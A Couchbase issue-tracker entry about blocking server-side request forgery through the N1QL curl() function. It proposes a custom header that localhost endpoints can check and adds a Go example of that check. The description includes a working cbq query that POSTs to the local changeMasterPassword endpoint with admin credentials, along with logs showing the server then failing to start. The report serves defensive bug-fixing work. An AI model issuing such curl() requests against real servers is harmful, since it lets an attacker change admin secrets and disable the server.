Couchbase Server
MB-24009 (parent issue MB-23133: CURL : Create custom http header for N1QL CURL to allow localhost endpoints to enable/disable access)

Check for N1QL CURL custom header, and reject request with failed authorization message.


Details

    • Type: Technical task
    • Resolution: User Error
    • Priority: Critical
    • Affects Version/s: 5.0.0
    • Fix Version/s: 5.0.0
    • Component/s: ns_server
    • Labels: None

    Description

      Attack scenario: under what context is CURL running on the server? Can I use CURL with a REST API call to reset the administrator password?

      Use a custom header for N1QL CURL: X-N1QL-User-Agent: couchbase/n1ql/1.7.0-N1QL

      Each localhost endpoint can manually check for this header string and disable access on its end.
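      An added example of the endpoint-side check this task describes, written in Go; it is not ns_server's or N1QL's own code. A handler wrapper refuses any request that carries the X-N1QL-User-Agent header, before credentials are considered, and is exercised against a constructed stand-in for the changeMasterPassword endpoint using the same POST as the cbq test below. The 403 status and the response wording are assumptions.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Marker header that N1QL's curl() adds to every outbound request (name and value from the issue).
const n1qlUserAgentHeader = "X-N1QL-User-Agent"

// rejectN1QLCurl wraps a localhost-only admin handler and refuses any request carrying the
// marker header, even with valid credentials. 403 and the body text are assumptions.
func rejectN1QLCurl(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Header.Get(n1qlUserAgentHeader) != "" {
			http.Error(w, "failed authorization: endpoint not available to N1QL CURL", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// changeMasterPassword is a constructed stand-in for the real ns_server endpoint.
func changeMasterPassword(w http.ResponseWriter, r *http.Request) {
	w.WriteHeader(http.StatusOK)
	fmt.Fprint(w, "master password changed")
}

// statusFor sends the POST from the issue's cbq example with Administrator credentials, either
// tagged as N1QL curl() or not, and returns the HTTP status (no listening server needed).
func statusFor(fromN1QL bool) int {
	guarded := rejectN1QLCurl(http.HandlerFunc(changeMasterPassword))
	req := httptest.NewRequest(http.MethodPost, "/node/controller/changeMasterPassword",
		strings.NewReader("newPassword=booyaa"))
	req.SetBasicAuth("Administrator", "password")
	if fromN1QL {
		req.Header.Set(n1qlUserAgentHeader, "couchbase/n1ql/1.7.0-N1QL")
	}
	rec := httptest.NewRecorder()
	guarded.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	fmt.Println("direct admin request:", statusFor(false)) // 200
	fmt.Println("via N1QL curl():     ", statusFor(true))  // 403
}
```

      The same wrapper can be applied to every localhost endpoint that should be unreachable through curl(), so the decision is made by the endpoint rather than by the caller's credentials.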

       

      Tested the following:

      cbq> select curl("http://Administrator:password@127.0.0.1:8091/node/controller/changeMasterPassword", {"data":"newPassword=booyaa","request":"POST"}) ;
      {
          "requestID": "9aab0709-3c7a-4167-909a-0438294fc4dd",
          "signature": {
              "$1": "object"
          },
          "results": [
              {
                  "$1": null
              }
          ],
          "status": "success",
          "metrics": {
              "elapsedTime": "15.852872ms",
              "executionTime": "15.836674ms",
              "resultCount": 1,
              "resultSize": 34
          }
      }

      This should not be authorized.

      If I quit Couchbase and then restart it, it gives an error message saying

      "Problem Running Couchbase : Couchbase server doesn’t seem to be operating properly. Check console logs for more details."

       

      When I look at the logs in babysitter.log:

      ns_server:debug,2017-04-19T15:37:13.155-07:00,[babysitter_of_ns_1@127.0.0.1Sending password to gosecrets
      ns_server:error,2017-04-19T15:37:13.168-07:00,[babysitter_of_ns_1@127.0.0.1Incorrect master password. Error: {error, "cipher: message authentication failed"}

       

      People

        Assignee: Isha Kandaswamy (isha, Inactive)
        Reporter: Isha Kandaswamy (isha, Inactive)
